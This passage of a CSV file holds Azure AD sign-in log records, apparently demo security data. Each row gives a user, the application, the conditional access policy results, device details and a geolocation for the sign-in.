80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",2f87158a-7a6e-452d-a55e-5e70a6646100,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,2f87158a-7a6e-452d-a55e-5e70a6646100,SigninLogs,Sucess,32.32146072,34.85319901
+223,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:25.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,dc28eabe-2330-4976-a308-e5e92998ade0,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",e9069a8f-c043-4e23-9435-a55672411800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,e9069a8f-c043-4e23-9435-a55672411800,SigninLogs,Sucess,33.7984581,-84.38828278
+224,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:48.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c52b82e-8f80-4fed-88d5-4ec394a5bb4d,Microsoft.aadiam,Microsoft.aadiam,,Yaniv Shasha,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:51,"{'operatingSystem': 'Windows 10', 'deviceId': '186ef690-f143-49cd-9d77-bcb2bdc8f0ef', 'browser': 'Chrome 80.0.3987', 'displayName': 'YANIVSH-SU', 'isCompliant': True, 'trustType': 'Hybrid Azure AD joined', 'isManaged': True}",fb07421f-5305-4d3e-a188-3d0ab96d2e00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},Yaniv Shasha,4daf13e6-b859-4673-a823-01853ff28370,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,fb07421f-5305-4d3e-a188-3d0ab96d2e00,SigninLogs,Sucess,32.32146072,34.85319901
+225,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:27.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2f68ceb4-b158-4a71-b10a-a3dd2636251e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",d774c493-40b1-4743-b785-3f4aadce1000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,d774c493-40b1-4743-b785-3f4aadce1000,SigninLogs,Sucess,33.7984581,-84.38828278
+226,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:28.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f309118f-5243-483f-87b4-33bb96d3c066,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,O365 Suite UX,4345a7b9-9a63-4910-a426-35363201d503,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",03932e54-fdb0-4c07-8405-8b9e971f1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,03932e54-fdb0-4c07-8405-8b9e971f1300,SigninLogs,Sucess,33.7984581,-84.38828278
+227,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,42:36.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9c03e93a-1c51-4e1f-8762-bec6602670af,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,ACOM Azure Website,23523755-3a2b-41ca-9315-f81f3f566a95,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:42,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",717b2614-8bf5-4739-9b58-3ba3bfc81200,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,717b2614-8bf5-4739-9b58-3ba3bfc81200,SigninLogs,Sucess,50.6406517,5.572050095
+228,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,53:03.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,29592158-7166-406a-8157-9b7da4661331,Microsoft.aadiam,Microsoft.aadiam,,Yechiel Levin,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 01:53,"{'operatingSystem': 'Windows 10', 'deviceId': '8a35c785-7c5f-463a-ab5e-126c006191f1', 'browser': 'Edge 18.1836', 'displayName': 'YELEVIN-X1', 'isCompliant': True, 'trustType': 'Hybrid Azure AD joined', 'isManaged': True}",5733c6a6-833e-448a-9ecf-b3a1fec61d00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.887760162353516, 'latitude': 32.084041595458984}, 'state': 'Hamerkaz', 'city': 'Petah Tikva'}",none,none,none,none,[],{'errorCode': 0},Yechiel Levin,71505601-c694-45ce-8220-4799035a14f5,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5733c6a6-833e-448a-9ecf-b3a1fec61d00,SigninLogs,Sucess,32.0840416,34.88776016
+229,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:12.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a132bb7c-8908-4230-a034-4b936626aa3d,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:34,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",368167e5-753b-476f-b20c-ef028a580500,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,368167e5-753b-476f-b20c-ef028a580500,SigninLogs,Sucess,50.6406517,5.572050095
+230,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:16.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,451656a1-2638-4b8f-89f3-b15f5cec0d56,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, 